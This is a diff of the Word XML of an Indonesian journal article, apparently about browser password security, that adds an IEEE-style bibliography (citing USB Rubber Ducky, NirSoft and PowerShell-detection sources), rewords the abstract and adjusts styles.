-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ma awal dan nama tengah, tanpa gelar akademik. (2) tahun penerbitan. (3) Judul. (4) tempat penerbitan. (5) nama penerbit. Untuk pemisah antar-unsur keterangan pustaka digunakan tanda titik “.”. Contoh rujukan [1] adalah untuk buku, sedangkan contoh rujukan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [2] adalah untuk jurnal dan rujukan [3] untuk website.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="5" w:line="228" w:lineRule="auto"/>
-        <w:ind w:firstLine="318"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lampiran</w:t>
-      </w:r>
-    </w:p>
+              <w:r>
+                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:b w:val="0"/>
+                </w:rPr>
+                <w:fldChar w:fldCharType="separate"/>
+              </w:r>
+            </w:p>
+            <w:tbl>
+              <w:tblPr>
+                <w:tblW w:w="5000" w:type="pct"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                <w:tblCellMar>
+                  <w:top w:w="15" w:type="dxa"/>
+                  <w:left w:w="15" w:type="dxa"/>
+                  <w:bottom w:w="15" w:type="dxa"/>
+                  <w:right w:w="15" w:type="dxa"/>
+                </w:tblCellMar>
+                <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+              </w:tblPr>
+              <w:tblGrid>
+                <w:gridCol w:w="726"/>
+                <w:gridCol w:w="8634"/>
+              </w:tblGrid>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="24"/>
+                        <w:szCs w:val="24"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[1] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t>Net MarketShare, "Operating System Market Share," October 2019. [Online]. Available: https://netmarketshare.com/.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[2] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t>W3Counter, "Browser &amp; Platform Market Share," 4 November 2019. [Online]. Available: https://www.w3counter.com/globalstats.php?year=2019&amp;month=11. [Accessed 4 November 2019].</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[3] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t>Mateso, "The Danger of Storing Passwords via Browser," 25 March 2019. [Online]. Available: https://blog.passwordsafe.de/en/2019/03/25/how-dangerous-is-it-to-store-your-passwords-in-the-browser/. [Accessed 5 December 2019].</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[4] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">B. Cannols and A. Ghafarian, "Hacking Experiment by Using USB Rubber Ducky Scripting," </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:i/>
+                        <w:iCs/>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">SYSTEMICS, CYBERNETICS AND INFORMATICS, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">pp. 66-71, 2017. </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[5] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">A. Hussain, A. Hammad, K. Hafeez and T. Zainab, "Programming a Microcontroller," </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:i/>
+                        <w:iCs/>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">International Journal of Computer Applications, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">vol. 155, no. 5, pp. 21-26, 2016. </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[6] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">L. Louis, "Working Principle of Arduino and Using It As a Tool for Study and Research," </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:i/>
+                        <w:iCs/>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">International Journal of Control, Automation, Communication and Systems (IJCACS), </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">pp. 21-29, 2016. </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[7] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t>N. Sofer, "About," May 2008. [Online]. Available: https://www.nirsoft.net/about_nirsoft_freeware.html. [Accessed 14 Juni 2020].</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[8] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">D. Hendler, S. Kels and A. Rubin, "Detecting Malicious PowerShell Commands using Deep Neural Networks," </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:i/>
+                        <w:iCs/>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">Asia Conference on Computer and Communications Security, </w:t>
+                    </w:r>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">pp. 187-197, 2018. </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[9] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">A. Silberschatz, G. Gagne and P. B. Galvin, Operating System Concepts, Hoboken, New Jersey: John Wiley &amp; Sons, 2018. </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+              <w:tr>
+                <w:trPr>
+                  <w:divId w:val="839932723"/>
+                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
+                </w:trPr>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="50" w:type="pct"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:ind w:left="284"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">[10] </w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+                <w:tc>
+                  <w:tcPr>
+                    <w:tcW w:w="0" w:type="auto"/>
+                    <w:hideMark/>
+                  </w:tcPr>
+                  <w:p>
+                    <w:pPr>
+                      <w:pStyle w:val="Bibliography"/>
+                      <w:jc w:val="both"/>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                    </w:pPr>
+                    <w:r>
+                      <w:rPr>
+                        <w:noProof/>
+                        <w:sz w:val="20"/>
+                        <w:szCs w:val="20"/>
+                        <w:lang w:val="id-ID"/>
+                      </w:rPr>
+                      <w:t>Computer Hope, "USB," 16 11 2019. [Online]. Available: https://www.computerhope.com/jargon/u/usb.htm.</w:t>
+                    </w:r>
+                  </w:p>
+                </w:tc>
+              </w:tr>
+            </w:tbl>
+            <w:p>
+              <w:pPr>
+                <w:ind w:left="284"/>
+                <w:divId w:val="839932723"/>
+                <w:rPr>
+                  <w:noProof/>
+                </w:rPr>
+              </w:pPr>
+            </w:p>
+            <w:p>
+              <w:r>
+                <w:rPr>
+                  <w:b/>
+                  <w:bCs/>
+                  <w:noProof/>
+                </w:rPr>
+                <w:fldChar w:fldCharType="end"/>
+              </w:r>
+            </w:p>
+            <w:bookmarkStart w:id="18" w:name="_GoBack" w:displacedByCustomXml="next"/>
+            <w:bookmarkEnd w:id="18" w:displacedByCustomXml="next"/>
+          </w:sdtContent>
+        </w:sdt>
+      </w:sdtContent>
+    </w:sdt>
     <w:p>
       <w:pPr>
         <w:pBdr>
@@ -9895,14 +10084,6 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>Jika diperlukan, tulisan dapat dilengkapi dengan lampiran.</w:t>
-      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11910" w:h="16850"/>
@@ -11290,6 +11471,7 @@
     <w:name w:val="heading 1"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
+    <w:link w:val="Heading1Char"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:pPr>
@@ -11402,6 +11584,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -11558,6 +11741,26 @@
         <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
       </w:tblBorders>
     </w:tblPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
+    <w:name w:val="Heading 1 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00C83517"/>
+    <w:rPr>
+      <w:b/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Bibliography">
+    <w:name w:val="Bibliography"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="37"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00C83517"/>
   </w:style>
 </w:styles>
 </file>
@@ -11883,7 +12086,7 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6">
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
   <b:Source>
     <b:Tag>Net19</b:Tag>
     <b:SourceType>InternetSite</b:SourceType>
@@ -12040,7 +12243,7 @@
     <b:DayAccessed>14</b:DayAccessed>
     <b:Year>2008</b:Year>
     <b:Month>May</b:Month>
-    <b:RefOrder>10</b:RefOrder>
+    <b:RefOrder>7</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Dan18</b:Tag>
@@ -12068,7 +12271,7 @@
     <b:JournalName>Asia Conference on Computer and Communications Security</b:JournalName>
     <b:Year>2018</b:Year>
     <b:Pages>187-197</b:Pages>
-    <b:RefOrder>11</b:RefOrder>
+    <b:RefOrder>8</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Abr18</b:Tag>
@@ -12097,7 +12300,7 @@
     </b:Author>
     <b:City>Hoboken, New Jersey</b:City>
     <b:Publisher>John Wiley &amp; Sons</b:Publisher>
-    <b:RefOrder>13</b:RefOrder>
+    <b:RefOrder>9</b:RefOrder>
   </b:Source>
   <b:Source>
     <b:Tag>Com19</b:Tag>
@@ -12114,13 +12317,13 @@
     <b:Month>11</b:Month>
     <b:Day>16</b:Day>
     <b:URL>https://www.computerhope.com/jargon/u/usb.htm</b:URL>
-    <b:RefOrder>14</b:RefOrder>
+    <b:RefOrder>10</b:RefOrder>
   </b:Source>
 </b:Sources>
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{217C7453-5E0D-4A6A-B724-5F6FD6D8670E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{07A4C272-15E7-401C-8963-0D2B7B558638}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/1202164284_Abdul Azies Muslim_Jurnal.docx
+++ b/1202164284_Abdul Azies Muslim_Jurnal.docx
@@ -460,6 +460,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Hlk43328671"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -467,17 +468,16 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve">Seiring dengan perkembangan sistem operasi Windows, aplikasi </w:t>
+        <w:t xml:space="preserve">Seiring dengan </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>bowser</w:t>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>berkembangnya</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -486,14 +486,44 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t xml:space="preserve"> juga berkembang pesat.</w:t>
+        <w:t xml:space="preserve"> sistem operasi Windows, aplikasi </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="id-ID"/>
+          <w:i/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>owser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -502,17 +532,92 @@
           <w:b/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Aplikasi </w:t>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">untuk menjelajah internet </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
-          <w:i/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-GB"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>juga berkembang pesat.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:i/>
